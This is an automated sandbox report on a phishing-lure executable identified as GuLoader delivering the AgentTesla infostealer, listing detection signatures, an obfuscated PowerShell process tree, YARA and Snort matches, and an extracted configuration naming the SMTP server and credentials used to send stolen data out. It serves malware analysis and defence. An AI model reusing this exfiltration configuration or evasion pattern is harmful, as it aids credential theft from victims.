Edit tour

Windows Analysis Report
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Overview

General Information

Sample Name:	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Analysis ID:	716470
MD5:	297cee2e9339ab19cb96a073ca8ba85f
SHA1:	b5467307b8d1bc03ca9ed311b2ca06a9806d3b47
SHA256:	9d0562b4cdc6c8a65119209d1f9dc4a06ce297afe2636b68a6772a470b0301a2
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Yara detected GuLoader

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Mass process execution to delay analysis

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Executable has a suspicious name (potential lure to open the executable)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe (PID: 408 cmdline: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe MD5: 297CEE2E9339AB19CB96A073CA8BA85F)

powershell.exe (PID: 1220 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2716 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6380 cmdline: powershell.exe 0x3A3A41D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5412 cmdline: powershell.exe 0x656176C0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1120 cmdline: powershell.exe 0x46696EC0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1584 cmdline: powershell.exe 0x41286F85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 3312 cmdline: powershell.exe 0x72342289 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6856 cmdline: powershell.exe 0x20692295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5524 cmdline: powershell.exe 0x78383295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2524 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6588 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2920 cmdline: powershell.exe 0x20302E85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1220 cmdline: powershell.exe 0x70203289 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8080 cmdline: powershell.exe 0x20692291 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1584 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5956 cmdline: powershell.exe 0x30783A95 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4492 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7228 cmdline: powershell.exe 0x30296B8B -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6136 cmdline: powershell.exe 0x723322FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6332 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6496 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5668 cmdline: powershell.exe 0x3A3A54CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7840 cmdline: powershell.exe 0x727477C4 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5796 cmdline: powershell.exe 0x6C416EC9 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6124 cmdline: powershell.exe 0x6F632ACC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5736 cmdline: powershell.exe 0x302C6B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6824 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 3160 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6820 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 3540 cmdline: powershell.exe 0x30783195 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2956 cmdline: powershell.exe 0x30302E85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1812 cmdline: powershell.exe 0x692032DD -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1224 cmdline: powershell.exe 0x34302BD5 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4976 cmdline: powershell.exe 0x2E7233FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4456 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5760 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2368 cmdline: powershell.exe 0x3A3A51C0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 3536 cmdline: powershell.exe 0x74466BC9 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6344 cmdline: powershell.exe 0x65506DCC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4488 cmdline: powershell.exe 0x6E7467D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7620 cmdline: powershell.exe 0x28697096 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6852 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 3468 cmdline: powershell.exe 0x31343091 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7588 cmdline: powershell.exe 0x202C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7632 cmdline: powershell.exe 0x20302ECC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5272 cmdline: powershell.exe 0x20302BCC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7464 cmdline: powershell.exe 0x2E7230FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 180 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5772 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6668 cmdline: powershell.exe 0x3A3A50C0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1628 cmdline: powershell.exe 0x616444CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2360 cmdline: powershell.exe 0x6C652ACC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7056 cmdline: powershell.exe 0x72332E85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7736 cmdline: powershell.exe 0x69207094 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7884 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1956 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7660 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4764 cmdline: powershell.exe 0x2C2A6B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6344 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5696 cmdline: powershell.exe 0x20302BCC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6200 cmdline: powershell.exe 0x2E7230FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1308 cmdline: powershell.exe 0x757367D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7184 cmdline: powershell.exe 0x3332389F -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6900 cmdline: powershell.exe 0x43616EC9 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6380 cmdline: powershell.exe 0x57696CC1 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4760 cmdline: powershell.exe 0x6F7752D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6828 cmdline: powershell.exe 0x6F63438D -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1708 cmdline: powershell.exe 0x69723385 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7372 cmdline: powershell.exe 0x2C692295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 1260 cmdline: powershell.exe 0x2C692295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7464 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 936 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 192 cmdline: powershell.exe 0x20302BFC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

CasPol.exe (PID: 6756 cmdline: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "slimshady@jubana.came*lVd67s:Mj_smtp.jubana.camslimshadyrrr@jubana.cam"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000097.00000000.63070891541.0000000000F00000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x21d6:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x2d11:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401 0x22f7:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
Process Memory Space: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe PID: 408	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: CasPol.exe PID: 6756	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 6756	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 6756	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x92e18:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x95051:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x93953:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401 0x95b8b:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401 0x92f39:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera 0x95172:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
Click to see the 5 entries

Snort Signatures

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.11.20 - Destination IP: 208.91.199.224

Timestamp:	192.168.11.20208.91.199.224498425872840032 10/05/22-09:37:55.889187
SID:	2840032
Source Port:	49842
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.11.20 - Destination IP: 208.91.199.224

Timestamp:	192.168.11.20208.91.199.224498425872851779 10/05/22-09:37:55.889187
SID:	2851779
Source Port:	49842
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.11.20 - Destination IP: 208.91.199.224

Timestamp:	192.168.11.20208.91.199.224498425872030171 10/05/22-09:37:55.889092
SID:	2030171
Source Port:	49842
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Agent Tesla SMTP Activity - Source IP: 192.168.11.20 - Destination IP: 208.91.199.224

Timestamp:	192.168.11.20208.91.199.224498425872839723 10/05/22-09:37:55.889092
SID:	2839723
Source Port:	49842
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	ReversingLabs: Detection: 73%
